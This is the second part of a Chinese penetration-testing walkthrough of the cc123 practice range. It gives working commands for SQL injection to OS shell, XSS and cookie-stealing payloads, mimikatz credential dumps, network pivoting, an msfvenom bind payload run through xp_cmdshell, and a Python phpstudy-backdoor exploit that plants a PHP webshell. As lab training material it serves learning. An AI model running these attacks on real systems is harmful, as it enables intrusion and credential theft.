零基础‘自外网到内网’渗透过程详细记录(cc123靶场)——下

news2024/11/24 15:39:44

细节较多,篇幅较大,分为上/下两部分发布在两篇文章内

另一部分详见下面文章

零基础‘自外网到内网’渗透过程详细记录(cc123靶场)——上icon-default.png?t=O83Ahttps://blog.csdn.net/weixin_62808713/article/details/143572185


八、第二层数据库服务器权限获取

猜到新闻资讯内存在注入漏洞。

抓包进行验证。

将数据包粘贴到kali内。

vim cc123_sql.txt

使用sqlmap尝试注入。

sqlmap -r cc123_sql.txt --dbms mssql -v 1 --batch

查看其数据库。

sqlmap -r cc123_sql.txt --dbms mssql -v 1 --batch --dbs

查看当前数据库及其用户。

sqlmap -r cc123_sql.txt --dbms mssql -v 1 --batch --current-db --current-user

获取到了当前站点使用的数据库后,获取其相关的详细信息。

查看数据库grcms_data的表信息。

sqlmap -r cc123_sql.txt --dbms mssql -v 1 -D grcms_data --tables

看到名为admin的表,扫描其内信息,至此拿到了用户名及密码信息。

sqlmap -r cc123_sql.txt --dbms mssql -v 1 -D grcms_data -T admin --dump

接下来查看其是否能执行shell,发现可以执行。

sqlmap -r cc123_sql.txt --dbms mssql -v 1 --os-shell

执行命令看是否有回显,发现成功扫描到两个ip地址。

ipconfig

根据上面扫描到的ip地址,可以判断该网站采用站库分离,即web程序和数据库不在同一个服务器内,可以提高安全性。

查看当前权限,发现是系统权限。

whoami

至此,拿到了数据库服务器的系统权限。

九、.net代码审计

打开蚁剑查看服务器的目录。

C:/HwsHostMaster/wwwroot

访问目录C:/HwsHostMaster/wwwroot

cd C:/HwsHostMaster/wwwroot
dir

可以看到这里存在三个网站。

切换到ww2.cc123.com后并查看。

cd ww2cc123_55m39g
dir

进入到web目录下并查看。

cd web
dir

可以看到其存在上述文件,但是并没有看到html后缀的文件,发现站点是做了伪静态。

进入到bin目录下并查看文件。

cd bin
ls

切换到bin目录的上一级下载bin目录。

cd..
download bin

将下载的文件全部复制到本地。

首先将下载的文件移动到kali的桌面上。

mv bin /home/kali/Desktop

将其复制到本地。

这里即为网站的源代码。

接下来使用ILSpy工具逆向DLL文件进行分析。

查看admin目录下的文件。

查看login.aspx文件,可以看到App_Web_login.aspx。

cat login.aspx

回到本地内找一下App_Web_login.aspx,将其拖拽到工具内。

可以看到下面验证登录的代码。

审计这部分代码,发现其验证码错误后会进行返回,如果验证码正确的话会继续向下执行,但是这里验证码并没有被注销,这就导致验证码重用的漏洞,存在密码爆破的风险。

继续审计,发现下图所示的部分的代码导致其存在注入风险。

查看之前的数据包,发现有个newsadd.aspx。

回到本地内找到后将其拖拽到工具内。

可以看到下图位置也存在sql注入。

经过具体的分析后,发现任意的后台文件都存在sql注入。

进入到网页的后台内,查看其编辑器,发现其使用的是KindEditor。

这个编辑器存在漏洞,可以进行文件上传,包括html文件和txt文件等。

使用burp抓包上传html文件获取cookie。

下面代码可以获取cookie。

回到网页内将上面的html文件上传并抓包。

选择html文件。

抓取到下图所示数据包。

将数据包发送到repeater。

将下图所示位置修改成file。

放包后发现上传成功。

访问html文件,成功获取到了cookie。

ww2.cc123.com/editor/asp.net/../attached/file/20240903/20240903162048_4230.html

下面来审计文件上传漏洞。

使用编辑器上传一个文件并抓包,发现其地址内有一个newsadd.aspx。

回到本机机内找到这个文件并审计。

Ctrl+F查找upload,找到上传部分的代码。

发现其对上传的文件的后缀名进行了白名单验证,这里并不存在漏洞。

接下来返回到后台页面内,进行xss漏洞挖掘。

回到kali内查看web文件夹内的前台文件。

dir

查看文件mystat.aspx。

cat mystat.aspx

发现其存在XSS漏洞。

访问mystat.aspx文件。

点击查看页面源代码。

源代码如下,测试可以看到其style字段可控。

根据源代码,写入XSS语句。执行后成功看到了弹窗。

http://ww2.cc123.com/mystat.aspx?style=</script><script>alert(/xss/);</script><script>

至此,通过代码审计,后台页面内XSS漏洞挖掘完成。

十、编写DESC解密工具

查看web.Config文件。

cat web.Config

可以看到其数据库连接信息。

复制后回到之前上传的ASPXSpy2014.aspx内。

http://new.cc123.com/a/ASPXSpy2014.aspx

点击DataBase,将前面复制的数据库信息输入。

server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123..

下图所示成功连接。

点击下面展示出来的TABLE_NAME,就可以把对应的sql语句显示在上面。

点击Query即可得到表内的信息。

这里就可以拿到用户名密码信息。

  • admin AE5F6187F32825CA
  • cc123 B97C57DB005F954242450A255217DA9F

尝试进行md5解密,发现均不成功。

再次利用ILSpy工具逆向分析其加密代码。

点击重新加载。

将后台登录文件拖入到工具内。

可以看到在密码部分的sql语句后面有一个字符串处理,包含一个key值。

点击进入Encrypt即为其加密方法。

其解密方法在加密方法的上方。

拿到上面的信息就可以编写解密工具了。

使用VS新建windows窗体应用程序项目。

在工具箱内选择添加组件,将其拖拽到下面。

给组件一个名字。

名字:DESC解密工具

接下来添加三个文本框,选择后将其拖拽到下面。

添加button组件。

将其命名为解密。

添加label标签。

分别命名。

调整细节。

添加名称。

名称:ranzi

双击“解密”进入编写解密代码。

复制刚刚的解密函数稍作更改后即可。

利用编写的解密工具解密得到用户名和对应的密码为:

  • admin cc123
  • cc123 qweasd123

十一、内网渗透

获取Web服务器路由信息,成功获取到了路由信息如下。

run get_local_subnets

接下来准备获取哈希值及明文密码。

首先做一下进程迁移,防止出错。

执行help命令查找终端。

help

执行ps命令找到vmtoolsd.exe进程,记住其进程号。

执行迁移命令。

migrate 1488

如下图所示即为迁移完成。

然后退出一下,然后进入一个新的会话。

background
sessions -i 2

加载Kiwi插件。

load kiwi

请求Kiwi获取调试权限,然后从系统的安全账户管理器(SAM)数据库中提取用户账户信息,包括用户名和哈希密码。

kiwi_cmd privilege::debug
kiwi_cmd "lsadump::sam"

提取当前登录用户的密码信息,包括明文密码和哈希值。

kiwi_cmd "sekurlsa::logonPasswords"

成功获取到了超级管理员的账号和密码明文。

整理前面获取到的信息,准备进行内网渗透:

  • 192.168.10.134
  • 10.10.10.128
  • Local subnet: 10.10.10.0/255.255.255.0
  • Local subnet: 192.168.10.0/255.255.255.0
  • Administrator  !@#Qwe123.

根据前面获取到的信息开始进行多重网段的内网渗透。

首先给web服务器进行添加路由。

run autoroute -s 10.10.10.0/24

验证是否成功添加。

run autoroute -p

退出一下准备启用代理模块。

background

调用模块并查看其需要的配置。

use auxiliary/server/socks_proxy
show options

修改配置信息。

set srvport 2222

开始执行。

run

验证前面操作是否成功。

首先修改配置文件。

vim /etc/proxychains4.conf

之后就可以进行内网扫描了。

proxychains nmap -sT -Pn 10.10.10.136

利用前面获取到的数据库的权限,获取数据库服务器网卡信息。

ipconfig

可以看到存在一个10.10.1.128的ip。

之后,要生成一个正向攻击载荷。

msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe >bind.exe

将生成的攻击载荷移动到桌面。

mv bind.exe /home/kali/Desktop

访问之前上传的ASPXSpy2014.aspx。

http://new.cc123.com/a/ASPXSpy2014.aspx

选择SA_Upfile将刚刚生成的攻击载荷上传。

选择前面移动到桌面的攻击载荷。

添加上传路径后点击上传。

c:/bind.exe

上传成功后选择XP_cmdshell exec进行执行。

修改执行语句后点击Query。

Exec master.dbo.xp_cmdshell 'c:/bind.exe'

接下来准备开始监听。

选择模块。

use exploit/multi/handler

设置payload。

set payload windows/meterpreter/bind_tcp

配置监听地址。

set rhost 10.10.10.136

配置监听端口。

set lport 13777

开始监听。

run

成功连接。

查看当前权限。

getuid

可以看到已经是系统权限。

十二、获取数据库服务器哈希和明文

查看服务器网卡信息。

ipconfig

可以看到两个ip信息:

  • 10.10.1.128
  • 10.10.10.136

首先做一下进程的迁移。

首先查看进程。

ps

执行迁移命令。

migrate 1548

然后退出一下,进入一个新的会话。

background
sessions -i 2

加载Kiwi插件。

load kiwi

请求Kiwi获取调试权限,然后从系统的安全账户管理器(SAM)数据库中提取用户账户信息,包括用户名和哈希密码。

kiwi_cmd privilege::debug
kiwi_cmd "lsadump::sam"

提取当前登录用户的密码信息,包括明文密码和哈希值。

kiwi_cmd "sekurlsa::logonPasswords"

下图成功获取到了超级管理员的账号和密码明文。

进入到shell内。

shell

查看数据库主机名。

hostname

看完之后crtl+z退出。

查看数据库服务器的路由。

run get_local_subnets

可以看到路由信息如下:

  • Local subnet: 10.10.1.0/255.255.255.0
  • Local subnet: 10.10.10.0/255.255.255.0

配置添加路由。

run autoroute -s 10.10.1.0/24

验证。

run autoroute -p

扫描10.10.1.129。

proxychains nmap -sT -Pn 10.10.1.129

可以看到其开放80端口,尝试使用代理进行访问,访问后可以看到其是phpstudy的页面。

proxychains3 firefox http://10.10.1.129

根据前面获取到的信息,确认其版本为5.4.45。

phpstudy的2016、2014、2018的php-5.2.17、php-5.4.45版本均存在后门。

十三、利用python编写phpstudy后门利用工具

确认漏洞的存在后,接下来进行编写后门利用工具。

创建phpstudy.py文件。

vim phpstudy.py

代码编写如下。

#conding:utf-8
import requests
import sys
import base64

shell = "system('"+sys.argv[1]+"');"
shell_base64 = base64.b64encode(shell.encode('utf-8'))

header={'Accept-charset':shell_base64,'Accept-Encoding':'gzip,deflate'}

def exploit(url):
    html = requests.get(url=url,headers=header).text
    return html

url = "http://10.10.1.129/"
print(exploit(url))
 "echo ^<?php @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"

执行上述py文件,向服务器写一个一句话木马。

proxychains3 python3 phpstudy.py "echo ^<?php@eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"

访问写入的shell.php文件,发现成功上传了。

十四、SocksCap代理访问目标WEB服务器

为了更方便访问,使用SocksCap代理访问第三层服务器。

双击安装SocksCap代理工具。

点击下一步。

点击我接受。

选择位置后点击安装。

点击完成结束安装。

双击启动。

复制kali的ip。

192.168.10.132

回到SocksCap代理工具内,点击新增代理。

点击编辑其ip,将kali的ip填入。

端口更改为2222。

代理类型更改为sock4。

此时点击保存即可。

保存完成后可以点击进行测试。

测试正常后就可以代理一些应用程序了,这里代理中国菜刀。

找到中国菜刀的exe程序。

将其拖拽到代理工具内。

选中程序右键点击后选择在代理隧道中运行选中程序。

在弹出的页面内右键后点击添加。

将前面上传到服务器上的shell添加上去,然后填入密码,设置为UTF-8,最后点击添加。

添加完成后双击即可进行访问。

退出后右键即可进入虚拟终端。

进入终端后执行whoami命令。

whoami

可以看到已经是系统权限。

十五、metasploit正向连接目标WEB服务器

将之前在kali内生成的bind.exe上传到服务器内。

通过终端执行刚刚上传的exe。

c:\bind.exe

退出一下。

background

查看当前配置信息。

show options

修改配置信息。

set RHOST 10.10.1.129

执行后查看其权限,发现是系统权限。

run
getuid

执行线程迁移操作。

migrate 1340

进入shell后即可查看当前所在网段有无其它主机。

shell
arp-a

至此拿到了第三层服务器的系统权限。

十六、Flag获取

1.第一个flag

首先进入到wwwroot目录下。

cd C:/HwsHostMaster/wwwroot/

查看目录下内容,并进入ww2cc123_55m39g目录。

dir
cd ww2cc123_55m39g

进入到web目录下并查看。

cd web
dir

进入到upimg目录下然后查看目录内容。

cd upimg
dir

在此可以看到一个flag文件,查看后即可得到第一个flag。

cat flag.txt

2.第二个flag

进入到c盘根目录下并查看。

cd c:/users
dir

看到Administrator文件夹,进入并查看。

cd Administrator
dir

在此可以看到一个flag文件,查看后即可得到第二个flag。

cat flag2.txt

3.第三个flag

连接到数据库服务器。

进入c盘并查看文件。

cd c:/users
dir

看到Administrator文件夹,进入并查看。

cd Administrator
dir

在此可以看到一个名为root.txt.txt文件,查看后即可得到第三个flag。

cat root.txt.txt

4.第四个flag

连接到第三城的服务器后进入c盘。

cd :\\users
dir

看到Administrator文件夹,进入并查看。

cd Administrator
dir

在此可以看到一个名为root.txt.txt文件,查看后即可得到第四个flag。

cat root.txt

至此,获取到了全部的flag。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2234634.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

参数跟丢了之JS生成器和包装器

如需转载请注明出处.欢迎小伙伴一起讨论技术. 逆向网址:aHR0cHM6Ly91bmlvbi5qZC5jb20vcHJvTWFuYWdlci9pbmRleD9wYWdlTm89MQ 跟踪接口:aHR0cHM6Ly9hcGkubS5qZC5jb20vYXBp 跟踪参数:h5st 本文目标:记录学习下自定义的生成器和包装器,不做具体的参数加密逻辑分析 直接启动器进…

【浪潮商城-注册安全分析报告-无验证方式导致安全隐患】

前言 由于网站注册入口容易被黑客攻击&#xff0c;存在如下安全问题&#xff1a; 1. 暴力破解密码&#xff0c;造成用户信息泄露 2. 短信盗刷的安全问题&#xff0c;影响业务及导致用户投诉 3. 带来经济损失&#xff0c;尤其是后付费客户&#xff0c;风险巨大&#xff0c;造…

openGauss数据库-头歌实验1-5 修改数据库

一、查看表结构与修改表名 &#xff08;一&#xff09;任务描述 本关任务&#xff1a;修改表名&#xff0c;并能顺利查询到修改后表的结构。 &#xff08;二&#xff09;相关知识 为了完成本关任务&#xff0c;你需要掌握&#xff1a; 1.如何查看表的结构&#xff1b; 2.如…

linux 磁盘配额 quota

增加一个facl的的知识点&#xff1a; linux中默认的文件系统支持facl&#xff0c;如果是新挂载的分区&#xff0c;则不支持facl应用。需要在挂载文件系统时使用-o acl选项来启用facl支持。如下图显示 在/etc/fstab添加defaults,acl 1.启用磁盘配额功能&#xff1a;修改/etc/f…

进程和线程概念

进程 进程是系统进程资源分配和调度的一个独立单位。 进程的状态与转换 就绪 -> 阻塞 -> 执行 另外还有一个挂起操作&#xff0c;可将进程转入静止状态&#xff0c;知道激活操作&#xff0c;程序将恢复原有状态。 线程 线程更加轻量&#xff0c;作为调度和分派的基本…

三周精通FastAPI:27 使用使用SQLModel操作SQL (关系型) 数据库

官网文档&#xff1a;https://fastapi.tiangolo.com/zh/tutorial/sql-databases/ SQL (关系型) 数据库 FastAPI不需要你使用SQL(关系型)数据库。 但是您可以使用任何您想要的关系型数据库。 这里我们将看到一个使用SQLModel的示例。 SQLModel是在SQLAlchemy和Pydantic的基础…

Java 并发编程学习笔记

参考资料&#xff1a; JAVA并发专题 - 终有救赎的专栏 - 掘金 Java并发编程学习路线&#xff08;建议收藏&#xfffd;&#xfffd;&#xff09; | Java程序员进阶之路x沉默王二 面试题目&#xff1a; JUC第一讲&#xff1a;Java并发知识体系详解 面试题汇总(P6熟练 P7精通…

Docker篇(基础命令)

目录 一、启动与停止 二、镜像相关的命令 1. 查看镜像 2. 搜索镜像 3. 拉取镜像 4. 删除镜像 三、容器创建与启动容器 1. 查看容器 2. 创建容器 交互式方式创建容器 守护式方式创建容器 3. 容器启动与停止 四、容器操作命令 1. 文件拷贝 2. 目录&#xff08;文件…

qt QColorDialog详解

1、概述 QColorDialog是Qt框架中的一个对话框类&#xff0c;专门用于让用户选择颜色。它提供了一个标准的颜色选择界面&#xff0c;其中包括基本的颜色选择器&#xff08;如调色板和颜色轮&#xff09;、自定义颜色输入区域以及预定义颜色列表。QColorDialog支持RGB、HSV和十六…

算法练习:904. 水果成篮

题目链接&#xff1a;904. 水果成篮。 题目意思就是可以选取两个种类的水果不能超过两个种类&#xff0c;该种类个数没有限制&#xff0c; 但是一旦超过两个种类的水果就要停止计数。 示例中数组编号就是就是种类&#xff0c;就是不能出现三个不同编号的数。 1.暴力解法&…

JAVA WEB — HTML CSS 入门学习

本文为JAVAWEB 关于HTML 的基础学习 一 概述 HTML 超文本标记语言 超文本 超越文本的限制 比普通文本更强大 除了文字信息 还可以存储图片 音频 视频等标记语言 由标签构成的语言HTML标签都是预定义的 HTML直接在浏览器中运行 在浏览器解析 CSS 是一种用来表现HTML或XML等文…

深度学习:卷积神经网络中的im2col

im2col 是一种在卷积神经网络&#xff08;CNN&#xff09;中常用的技术&#xff0c;用于将输入图像数据转换为适合卷积操作的矩阵形式。通过这种转换&#xff0c;卷积操作可以被高效地实现为矩阵乘法&#xff0c;从而加速计算。 在传统的卷积操作中&#xff0c;卷积核&#xff…

【论文阅读】Associative Alignment for Few-shot Image Classification

用于小样本图像分类的关联对齐 引用&#xff1a;Afrasiyabi A, Lalonde J F, Gagn C. Associative alignment for few-shot image classification[C]//Computer Vision–ECCV 2020: 16th European Conference, Glasgow, UK, August 23–28, 2020, Proceedings, Part V 16. Spri…

HCIP-HarmonyOS Application Developer V1.0 笔记(五)

弹窗功能 prompt模块来调用系统弹窗API进行弹窗制作。 当前支持3种弹窗API&#xff0c;分别为&#xff1a; 文本弹窗&#xff0c;prompt.showToast&#xff1b;对话框&#xff0c;prompt.showDialog&#xff1b;操作菜单&#xff0c;prompt.showActionMenu。 要使用弹窗功能&…

【办公类-04-04】华为助手导出照片视频分类(根据图片、视频的文件名日期导入“年-月-日”文件夹中,并转移到“年-月”文件中整理、转移到“年”文件夹中整理)

背景需求 最近带班&#xff0c;没有时间整理照片&#xff0c;偶尔导一次&#xff0c;几个月的照片。发现用电脑版“华为手机助手“中的WLAN连接”与华为手机的“华为手机助手”连接&#xff0c;速度更快、更稳定&#xff0c;不会出现数据线连接时碰碰就断网的问题 1、先打开电…

人工智能技术:未来生活的“魔法师”

想象一下&#xff0c;未来的某一天&#xff0c;你醒来时&#xff0c;智能助手已经为你准备好了早餐&#xff0c;你的智能家居系统根据你的心情和日程安排调整了室内的光线和音乐&#xff0c;而你的自动驾驶汽车已经在门口等你。这不是科幻小说&#xff0c;这是人工智能技术为我…

Golang | Leetcode Golang题解之第538题把二叉搜索树转换为累加树

题目&#xff1a; 题解&#xff1a; func getSuccessor(node *TreeNode) *TreeNode {succ : node.Rightfor succ.Left ! nil && succ.Left ! node {succ succ.Left}return succ }func convertBST(root *TreeNode) *TreeNode {sum : 0node : rootfor node ! nil {if n…

信号带宽和上升沿的关系:【图文讲解】

目录 1&#xff1a;什么是信号带宽 2&#xff1a;带宽计算公式 3&#xff1a;实际应用 这里讨论的信号&#xff0c;是指数字信号&#xff0c;默认为方波信号。 方波是一种非正弦曲线的波形&#xff0c;具有明确的“高”和“低”两个电平值&#xff0c;且占空比&#xff08;…

大数据新视界 -- 大数据大厂之 Impala 性能优化:从数据压缩到分析加速(下)(8/30)

&#x1f496;&#x1f496;&#x1f496;亲爱的朋友们&#xff0c;热烈欢迎你们来到 青云交的博客&#xff01;能与你们在此邂逅&#xff0c;我满心欢喜&#xff0c;深感无比荣幸。在这个瞬息万变的时代&#xff0c;我们每个人都在苦苦追寻一处能让心灵安然栖息的港湾。而 我的…